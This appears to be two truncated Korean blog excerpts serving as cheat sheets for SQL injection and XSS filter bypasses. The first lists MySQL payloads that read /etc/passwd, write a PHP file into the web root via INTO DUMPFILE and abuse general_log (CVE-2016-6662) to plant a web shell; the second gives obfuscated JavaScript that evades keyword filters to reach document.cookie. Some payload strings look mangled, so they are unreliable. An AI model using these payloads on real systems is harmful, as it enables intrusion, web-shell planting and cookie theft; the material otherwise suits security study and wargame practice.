1. 특정 값을 비교해야 하는 상황에서 사용할만한 것들 select 'admin'='admin'; # True select 'admin''admin'; # True (NULL도 비교할 수 있다.) select 'admin'!='admin'; # False select 'admin''admin'; # False select 'admin'' into dumpfile '/var/www/html/ch4njun.php'; select load_file('/etc/passwd'); # CVE-2016-6662 set global general_log_file = '/var/www/html/ch4njun.php'; set global general_log = on; select ''; 6. Union와 같이 내가 원..
1. 잘못된 정규표현식 우회 // data:,alert('ch4njun') 와 같이 &comma를 통한 문자인코딩을 활용 할 수 있다. 2. 키워드 필더링 우회 // r 는 문자인코딩을 통해 r로 바뀐다. // src에 about:을 통해서도 onerror를 발생시킬 수 있다. 사실 중요한 부분은 아닌거같... 3. // 2번에서 나오지 않은 것들에 대해서 소개해봤다..ㅎ 4. 마침표(.), 키워드 필터링 우회 this['al'+'ert']((({'\u0063ookie':x})=>x)(self['\x64ocument'])) // [ ]를 사용해 .을 대신할 수 있고, [ ] 내부에서는 문자열을 사용하기 때문에 +를 통해 키워드 필터링을 우회할 수 있다. // \x64는 문자 인코딩을 통해 d로..